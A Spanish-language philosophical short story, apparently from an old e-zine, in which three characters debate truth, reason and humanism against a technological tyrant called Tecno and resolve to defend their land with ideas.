Yo odio que se me mire como extraño; como si hubiera sido afectado por algun nuevo virus producto de nuestra avanzada biogenetica.( Laconicamente ironico sonrio y continuo ): -¿Por que? -¿Por pensar? -¿Por querer ser diferente de los demas?. - En eso estoy totalmente de acuerdo. Dijo Albion enfatizando: -El otro dia, encontre en un viejo libro una frase que me hizo dudar... - Decia: " DEJAR HACER DEJAR PASAR, EL MUNDO MARCHA POR SI MISMO ". -¿Esto quiere decir que debemos conformarnos con la desaparicion de Humania? -¿Realmente nos estamos oponiendo al progreso, a lo inevitable? - O simplemente somos el ultimo reducto de quienes nos negamos a dejar de soñar. -De quienes nos oponemos a la tecnoenagenacion y al empobrecimiento de los valores humanos, inutilmente... - Es verdad Albion. Dijo Zigo. -Muchas veces lo he pensado. Tecno a traves del cultivo y expansion de nuestras necesidades, incremento nuestra dependencia, desviandonos a un camino sin retorno para abolir la libertad. -Sin derramar una sola gota de sangre nos empujo en una caida total en nuestra propia antitesis. -En pocas palabras, nos entregamos nosotros mismos. -No se trata de paranoia ni miedo existencial. -Nada mas tienes que abrir los ojos y ver, no mirar simplemente, VER con la razon que estamos proximos a la extincion total. -Humania esta casi perdida; de esto pocos se dan cuenta Cultus, y de ellos, a pocos les importa nada que asi suceda. -Yo no te pregunto quien tiene la razon, sino ¿que es la razon? Cultus... Con cierto enfado Cultus contesto: -Creo que la razon se perdio hace algun tiempo, cuando la filosofia quedo preñada al final de una epoca de obscuridad llamada edad media; tuvo esta una hija a quien llamaron ciencia. Identica a su madre, solo trajo al nacer dos defectos congenitos: La miopia y la falta de "CON". Precisamente por esto su madre la llamo ciencia. -Y creeme Zigo, aunque todo el mundo lo calle, esta es la verdadera madre de Tecno, nuestro tirano. - Lo dices como si ya lo hubieras aceptado Cultus. Dijo Albion. - De ninguna manera, exclamo Cultus. -El unico objeto de mi vida es que Humania vuelva a ser Humania; que nuestra tierra recupere la salud reinstaurando el respeto a nuestra verdadera madre, la naturaleza. -Debemos recuperar el equilibrio que se perdio y volver a tener como unica meta del ser humano el sentido de la verdad. - Espera Cultus. Interrumpio Albion. -El otro dia dijiste que la verdad era el arma mas potente para recuperar la libertad, y ¿ahora nos dices que...¿es nuestra unica meta? ¿Pero es acaso que existe esta poderosa arma? -¿Es posible encontrarla?...-¿Que es la verdad Cultus? Mirando fijamente a los ojos de sus compañeros, Cultus aclaro la voz y dijo: -Empezare por afirmar lo que entiendo por verdad. Para mi la verdad no tiene tiempo ni espacio. -La verdad no puede estar sujeta al tiempo por que lo que hoy es verdadero, necesariamente tiene que serlo mañana y lo fue ayer y lo sera dentro de millones de años... - ¿Cierto o no?. Y continuo: -La verdad no puede tener espacio, por que lo que es verdad aqui, necesariamente lo tendra que ser en todos los extremos del Universo, si no, no seria verdad. Es verdad en Pragma, es verdad en Humania, es verdad en la Luna y en la galaxia mas remota. -¿No es cierto? - Ademas, las verdades son indestructibles. Y ningun objeto de la naturaleza puede encarnarlas, por que no son de este mundo. Cualquier cosa al paso del tiempo se desmerita, nada material permanece inmutable y ¿en donde seria posible depositar pues, una verdad si los objetos tangibles estan imposibilitados para ello?. Cierto es que de alguna manera pueden estos reflejarla, pero solo en esencia. - Es decir Cultus, dijo Albion. -¿Que esta arma pertenece a otro mundo, que es omnipresente? -¿Que no podemos verla ni tocarla? ¿que esta mas alla de nuestra tercera dimension? -¿Pero que es real? -¿No estaras abusando de la imaginacion? ¿Puede ser eso posible? -No? - Y ¿como puedo yo darme cuenta de su existencia? ¿como puedo ingresar a ese mundo en donde no hay tiempo ni espacio? -¿Es esta la cuarta dimension? -Por favor Cultus! no hagas que pierda la razon. Dime una verdad, una sola con todas estas caracteristicas y te creere, exclamo Albion, al borde de la histeria. - Calmate Albion, deja que Cultus nos explique. Dijo Zigo tratando de tranquilizarlo. - Miren, continuo Cultus. -Yo creo que una de las cosas mas grandes que el humano ha inventado es el lenguaje; es su codigo de comunicacion natural. A traves del lenguaje se pueden hacer sensibles a nuestros sentidos casi todas las verdades. -Observen. Cultus tomo un poco de tiza del piso de la habitacion y con esta dibujo el numero UNO en la pared. Casi inmediatamente Albion se puso de pie y al tiempo que sonreia burlonamente borro con su mano el numero dibujado por Cultus, exclamando: -Dijiste que la verdad era indestructible y mira ya no existe!. -Solo has borrado el simbolo con el que significamos a la unidad; la verdad es que la UNIDAD, es una IDEA y esta es indestructible, ¿Quien puede destruir una idea? esta habita en un mundo maravilloso al que solo puedes ingresar con tu mente, un mundo al que Tecno te quiere vedar la entrada atrofiandote el cerebro, engañandote con la patraña que lo material es lo unico que importa; y te seduce con una mentira, que no existe, que lo mas placentero es entregarse al goce de los sentidos. -¿QUIEN EXISTE ENTONCES CULTUS? ¿QUIEN QUIERE SABERLO? -YO !!! - En efecto, no tu mano, tu pie, sino la parte de ti que mas ha evolucionado, aquella que domina la materia; aquella que te hace ser humano; lo que trasciende al tiempo y al espacio. Lo que muere de nuestros grandes hombres, es lo que menos importa de ellos. - Eso creo dijo Zigo. -Atentar contra la libertad fisica es bestial; pero ir en contra de la libertad interior, solo podria ocurrirsele a Tecno. La carcel interior es la automatizacion, Albion. Todo lo que tienes que hacer para ser libre, es pensar. Todo lo que tienes que hacer para ser humano, es pensar bien. Es por eso que Tecno, al decretar la prohibicion del pensamiento, le ha dado mas vida a la libertad. ¿Hay seduccion mas peligrosa que la de perder la fe?.¿Hay reto mas grande que el amable azar? No Albion. Nuestra naturaleza no se equivoca; al tigre, le dio garras; al ave, la doto de alas; al oso le proporciono de gran pelambre y fuerza para subsistir a los embates del tiempo y sus enemigos. ¿No se te hace injusto, aparentemente, que nosotros los humanos carezcamos de todo esto, o bien que seamos los hijos predilectos de nuestra madre? -¿Que nos hace diferentes al resto de nuestros hermanos del reino animal?. ¿Que funcion nos distingue de las bestias, Albion? - Creo que el razonamiento Zigo. -¿Como dirimen las bestias sus diferencias? - Con la fuerza, con la violencia. - Y si al hombre se le entorpece esta facultad, ¿que crees que suceda? - Lo que sucede en Pragma: Los asesinatos en masa, los motines, las guerras provocadas con absurdos pretextos, el abuso de la fuerza, el suicidio mediato e inmediato a traves de los toxicos, la paz, mantenida con la amenaza. - Verdad que la libertad es una condicion humana, sin patente, sin nacionalidad. - Yo te pregunto Albion: -¿Que le hace al hombre de Humania ser humano? vivir en armonia con su entorno, en verdadera paz; ser sensible a la problematica existencial; interesarse por el futuro; tener esperanza, amar, buscar alcanzar los valores que le perfeccionan en su nucleo; apreciar la belleza, el arte, aspirar a ser creador, reconocer ser parte de un TODO. Con tradicion, con rostro, con una cultura propia. Articulado a esta, tiene sentido su ser; desarticulado, es basura, contaminacion, muerte. - El humanismo debe ser defendido con sus propias armas; con la razon; ha sido la lucha de todos los justos de todos los tiempos. Los contrarios forman el SER, es cierto, el antagonismo eterno es otra verdad; pero tambien lo es, el equilibrio, la armonia que expresa en su afan la luz como maxima expresion de libertad, y la gravitacion como su extremo, su opuesto justo. - Es la repeticion de la historia Cultus, recuerda que siempre los barbaros han invadido a las grandes culturas, como sucedio en Grecia, como sucedio en Roma, como sucedio en Mexico, socavando sus estructuras,su cultura, sus tradiciones. Hasta dejarlas como piezas de museo. - Observa como en nuestras instituciones educativas, prevalece la indigencia academica, la mediatizacion de la enseñanza y el condicionamiento operante ha hecho estragos en las mentes de nuestros hermanos; la sintetizacion del conocimiento los ha desarticulado de la realidad; casi se han proscrito la critica y el analisis para anular cualquier brote de disidencia y asegurar paz y continuidad a los sistemas implantados por Tecno. Solo el libertinaje fisico es subsidiado por nuestro tirano. El Humanismo libre fue trocado por el automatismo institucional. La era de la inbecivilizacion anuncia el inicio del caos. - ¿Quieres decir Zigo, que la mejor manera de dominar a un pueblo es a traves de la distorcion de sus sistemas educativos?, pregunto Albion. - Efectivamente, asi como puede obtenerse el progreso de un pueblo, es tambien la manera mas sutil, mas moderna de controlarlo; en la epoca de la especializacion, el humano quiere ya parecerse o ser una maquina y olvidandose que es parte de la naturaleza, inventar en el Universo un mundo aparte. -¿No resulta esto aberrante?. - Debemos rebelarnos, luchar. Cultus se lleva las manos a la cabeza, peinandose el pelo hacia atras al tiempo que dice: -No todo esta perdido. Debemos iniciar la defenza de Humania con las unicas armas que conocemos: Las ideas del Humanismo. Han pasado ya algunos años desde aquellas reuniones en que Cultus, Albion y Zigo decidieron iniciar la lucha. Adanes ha cambiado, ya no es una pequeña ciudad; en ella se respira, a decir de los visitantes, cierto aire que los invita a soñar, a pensar; a eso se debe que haya sido rebautizada como el lugar de los soñadores, de los poetas, pintores, cantores; de los que aman el ARTE. Por Escudo Humeante (pacal) Tecno=Tecnologia Ciencia=Sin conciencia Se autoriza su copia y distribucion siempre y cuando no se utilize con fines de lucro o personales. [ Gracias por haberlo enviado. Para no utilizarlo con fines de lucro no fue vendido y para evitar ganar lectores gracias al texto no lo incluimos en el indice :-) ] [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ -EOF- -EOF- -EOF- -EOF- EOF- -EOF- -EOF- -EOF- ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]